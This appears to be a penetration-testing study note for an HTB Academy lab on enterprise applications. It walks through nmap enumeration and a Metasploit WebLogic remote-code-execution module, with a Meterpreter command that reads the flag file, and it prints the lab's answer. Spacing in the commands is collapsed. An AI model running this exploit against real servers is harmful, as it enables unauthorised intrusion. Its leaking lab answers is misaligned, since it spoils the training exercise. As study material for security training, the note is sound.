π― Objective: Reference guide for additional applications commonly encountered during penetration tests with their attack vectors and default credentials.
Overview
Beyond the main applications covered in this module, penetration testers encounter many other applications in enterprise environments. This reference covers common vulnerabilities, default credentials, and attack techniques for frequently seen applications.
HTB Academy Lab Solutions
Lab 1: Application Identification
Question: "Enumerate the target host and identify the running application. What application is running?"
# Standard enumerationnmap-sV-sCtarget# Expected: WebLogic server identification
Lab 2: WebLogic RCE Exploitation
Question: "Enumerate the application for vulnerabilities. Gain remote code execution and submit the contents of the flag.txt file on the administrator desktop."
Method: Metasploit WebLogic RCE
# Launch Metasploitmsfconsole-q# Use WebLogic RCE moduleusemulti/http/weblogic_admin_handle_rce# Set target optionssetRHOSTSSTMIPsetSRVHOSTPWNIPsetLHOSTPWNIP# Execute exploitexploit# In Meterpreter session:catC:/Users/Administrator/Desktop/flag.txt
Answer:w3b_l0gic_RCE!
Notable Applications
π§ Application Servers
Axis2
Description: Web services framework (often on Tomcat)
π‘ Pro Tip: Many enterprises run hundreds of different applications - develop a systematic approach to quickly identify, fingerprint, and test each one. Often the most critical vulnerabilities are in lesser-known monitoring or management applications running with high privileges.